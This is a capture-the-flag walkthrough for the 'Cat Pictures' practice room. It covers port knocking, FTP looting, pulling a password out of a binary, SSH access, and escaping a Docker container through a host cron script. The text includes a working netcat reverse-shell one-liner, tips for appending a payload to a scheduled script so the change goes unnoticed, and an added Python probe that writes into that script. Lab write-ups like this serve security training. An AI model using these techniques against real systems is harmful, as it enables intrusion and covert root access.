Cat Pictures
https://tryhackme.com/room/catpictures
User flag
As usual, we start with an nmap scan of every port, with service and version detection (-A):
nmap -T4 -A -p- 10.10.192.184


We see three open ports (22, 4420 and 8080). If we take a look at 4420 we get the following:

So let's head to the web server on port 8080 and see what we find.

It looks like a classic old-school forum. Let's take a look around and see if we can find something interesting.

Knock, knock? That is a hint at port knocking: the host opens a hidden service only after it sees connection attempts to a specific sequence of ports, in order. Run the following from the attacking machine (-Pn skips host discovery, so each run is a single probe against the knocked port):
for PORT in 1111 2222 3333 4444; do nmap -Pn 10.10.192.184 -p $PORT; done
If we run another nmap scan afterwards, a new port is open on the host:

Now we can connect to the FTP server and pull down everything it offers.

Among the downloaded files is a note that gives us a password for the internal shell on port 4420 we found earlier.

If we connect to port 4420 and enter the password from the note, we get access to the internal shell.

Now we want a proper shell from this restricted one. Start a listener on the attacking machine first (the payload below calls back to 10.11.36.103 on port 9001), then run this in the internal shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.36.103 9001 >/tmp/f
Once the new shell calls back we can move around the filesystem with "cd" and look around the system.

Let's do what it says and run it.

Damn, it asks for a password we don't have yet.
After a while searching different folders for the password without success, we cat the "runme" binary itself (strings would do the same more cleanly) and find something interesting embedded in it:

If we try "rebecca" as the password, the binary hands us an SSH private key.

Let's copy that id_rsa to our machine, set its permissions to 600 (ssh refuses a key that is readable by group or others) and use it to SSH into the target.

We're in, and by the looks of it we are inside a container.

Root flag
Now we have to break out of the Docker container. After running linpeas to gather information about the system we see the following:

Let's read the .bash_history file:

Confusing at first. From the way the user edited the file, we can assume that a cron job on the host, outside the container, runs /opt/clean/clean.sh, and that the script is reachable (and writable) from inside the container.
To check whether we're right, we can append a reverse shell to the file and see if we get a callback. Appending rather than overwriting keeps the original cleanup commands intact, so the job keeps working and the edit is less likely to be noticed.
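A more careful version of that check, as an added Python example that is not part of the original writeup: before planting a reverse shell, append a small probe to the scheduled script that records hostname, identity and PID 1's cgroup to a log file, then interpret the log to confirm the job really ran on the host rather than in our own container. The log location, the /proc/1/cgroup test and the sample log contents are this example's own assumptions and constructed data, not from the writeup.

```python
"""Confirm where a cron-run script executes before planting a payload.

Added example (not from the writeup). Assumes the scheduled script is
writable from inside the container, as the text infers for
/opt/clean/clean.sh; the log path and the cgroup heuristic are assumptions.
"""
from pathlib import Path

PROBE_MARKER = "# ctx-probe"  # marker line makes append_probe idempotent


def build_probe(log_path):
    """Shell lines to append to the scheduled script.

    Absolute binary paths because cron runs with a minimal PATH; 2>&1 so a
    missing binary still leaves a trace in the log instead of silence.
    """
    return "\n".join([
        PROBE_MARKER,
        f"/bin/hostname >> {log_path} 2>&1",
        f"/usr/bin/id >> {log_path} 2>&1",
        f"/bin/cat /proc/1/cgroup >> {log_path} 2>&1",
        "",
    ])


def append_probe(script_path, log_path):
    """Append the probe exactly once, keeping the original script intact so
    the scheduled job keeps doing its normal work. Returns True if written."""
    script = Path(script_path)
    text = script.read_text()
    if PROBE_MARKER in text:
        return False
    if text and not text.endswith("\n"):
        text += "\n"
    script.write_text(text + build_probe(log_path))
    return True


def interpret_probe_log(log_text, container_hostname):
    """Decide whether the probe ran on the host or inside our container.

    PID 1 of a Docker container lives in a cgroup path mentioning 'docker'
    (or containerd); PID 1 on the host sits in '/' or a systemd slice. The
    hostname is a second, independent signal.
    """
    lines = [ln.strip() for ln in log_text.splitlines() if ln.strip()]
    hostname = lines[0] if lines else ""
    id_line = next((ln for ln in lines if ln.startswith("uid=")), "")
    cgroup_lines = [ln for ln in lines if ln.count(":") >= 2]
    in_container = (
        hostname == container_hostname
        or any("docker" in ln or "containerd" in ln for ln in cgroup_lines)
    )
    return {
        "hostname": hostname,
        "is_root": id_line.startswith("uid=0("),
        "on_host": bool(lines) and not in_container,
    }


# Constructed sample logs (not real output from the room).
SAMPLE_HOST_LOG = """\
ubuntu-host
uid=0(root) gid=0(root) groups=0(root)
12:pids:/
0::/init.scope
"""

SAMPLE_CONTAINER_LOG = """\
f8d2a1b4c3e5
uid=0(root) gid=0(root) groups=0(root)
12:pids:/docker/f8d2a1b4c3e5aaaa
0::/
"""

if __name__ == "__main__":
    print(interpret_probe_log(SAMPLE_HOST_LOG, "f8d2a1b4c3e5"))
    print(interpret_probe_log(SAMPLE_CONTAINER_LOG, "f8d2a1b4c3e5"))
```

Only when `on_host` and `is_root` both come back True is it worth swapping the probe for the reverse shell; if the log never appears, the script is not being executed from the host at all and a different route is needed.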

After a few seconds the shell comes back from the host, and with it the root flag.

